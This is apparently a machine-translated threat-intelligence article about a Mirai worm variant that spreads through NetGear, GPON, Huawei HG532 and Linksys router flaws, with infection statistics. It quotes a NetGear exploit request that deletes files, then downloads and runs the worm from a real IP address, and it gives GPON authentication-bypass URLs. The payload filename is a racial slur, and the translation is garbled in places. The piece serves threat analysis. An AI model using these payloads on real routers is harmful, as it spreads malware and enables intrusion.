Router vulnerability-prone, Mirai new variant of the struck-vulnerability warning-the black bar safety net

One, Foreword
Recently, Tencent Security Cloud Ding lab to listen to the wind threat perception platform monitoring the discovery A to attack router worm, after analysis, found that this worm is mirai virus new variants, and before mirai viruses, the worms not only by the early generation of mirai using the telnent blast to attack more through the router vulnerability to attack propagation.

Second, the Playload and vulnerability analysis
The sample in the propagation and attack involved in the process to 4 PlayLoad, are for the router to attack, we will for related vulnerabilities are introduced, and for the spread of the use of sampling data for statistical analysis. Table PlayLoad case:
!
Figure impact of device distribution:
! [](/Article/UploadPic/2018-11/20181127223313341. png)
Data source: Tencent Security Cloud Ding laboratory
On the figure is several the router vulnerability the national level, China, Russia, Japan and the United States are affected more severely in the country. With the national level of development, the network popularity there is a certain relationship, but also with the above several router sales area has a strong Association. Since the domestic equipment and more, security is not high, China’s future IoT security is facing enormous challenges.
Below we address these four vulnerabilities were introduced:
01 NetGear router any execution vulnerability CNNVD-201306-024）

1. the vulnerability analysis:
   The POC through the GET method to perform the setup. cgi, by the todo command is executed syscmd, by syscmd to execute the download and execution of virus commands.
   GET/setup. cgi? next_file=netgear. cfg&todo;=syscmd&cmd;=rm±rf+/tmp/*;wget+http://46.17.47.82/gvv±O+/tmp/nigger;sh+nigger+netgear&curpath;=/&currentsetting.htm;=1 HTTP/1.1 rnrn
   The code is as follows:
   A, execute the setup. cgi after executing setup_main: the
   ! [](/Article/UploadPic/2018-11/20181127223313703. png)
   B, use the GET and POST methods can be submitted to the POC of:
   ! [](/Article/UploadPic/2018-11/20181127223313103. png)
   Todo parameter directly behind the transfer of the file, without doing any filtering, there is also the use of local, direct calls syscmd to execute their desired commands.
   ! [](/Article/UploadPic/2018-11/20181127223313724. png)
2. the spread of cases:
   Figure NetGear DGN devices remote arbitrary command execution vulnerability attack data statistical sampling
   ! [](/Article/UploadPic/2018-11/20181127223314826. png)
   Data source: Tencent Security Cloud Ding laboratory
   Initiated NetGear exploit most of the region is Russia, it can be inferred with a NetGear vulnerability scanning, virus vector infection.
   02 GPON fiber router command execution vulnerability, CVE-2018-10561/62）
3. the vulnerability analysis:
   On the device running the HTTP server in the authenticate check a particular path, the attacker can use this feature to bypass any terminal on the authentication.
   Through in URL after adding a specific parameter ? images/eventually get access:
   http://ip:port/menu.html?images/
   http://ip:port/GponForm/diag_FORM?images/
   Figure GPONPlayLoad: the
   ! [](/Article/UploadPic/2018-11/20181127223314476. png)
4. the spread of cases:
   Figure GPON device to a remote arbitrary command execution vulnerability attack data statistical sampling
   ! [](/Article/UploadPic/2018-11/20181127223314850. png)
   Data source: Tencent Security Cloud Ding laboratory
   The vulnerability of viral vector infection of a large range, for China, Georgia, Egypt the impact of the most widely used. China, the United States of the optical fiber is developing rapidly, Egypt and Georgia by the Chinese influence, the fiber development speed is also very fast, and also their affected equipment and more for a reason.
   03 Huawei HG532 series router remote command execution leakage（CVE-2017-17215）
5. the vulnerability analysis:
   Figure HG532 PlayLoad
   ! [](/Article/UploadPic/2018-11/20181127223314383. png)
   We can observe POC first submit an identity authentication information, after the upgrade the inside of the NewStatusURL tag performed want to execute the command. Module in the upnp, we find the upnp module, and find NEwStatusURL tag, the code directly through the SYSTEM to perform command-upg-g-u %s-t ‘Firmware Upgrade…’that Do not do any filtering.
   ! [](/Article/UploadPic/2018-11/20181127223314572. png)
6. the spread of cases:
   Figure Huawei HG532 device remote command execution vulnerability attack data statistical sampling
   ! [](/Article/UploadPic/2018-11/20181127223314295. png)
   Data source: Tencent Security Cloud Ding laboratory
   Figure CVE-2017-17215 world sphere of influence
   ! [](/Article/UploadPic/2018-11/20181127223314846. png)
   Data source: Tencent Security Cloud Ding laboratory
   Through the Huawei HG532 device remote command execution attack statistics, as can be seen, the use of this vulnerability to viral vectors or scan in China, Japan, Russia is very active.
   04 Linksys multiple routers tmUnblock. cgi ttcp_ip parameter remote command execution vulnerability CNVD-2014-01260）

[1] [2] next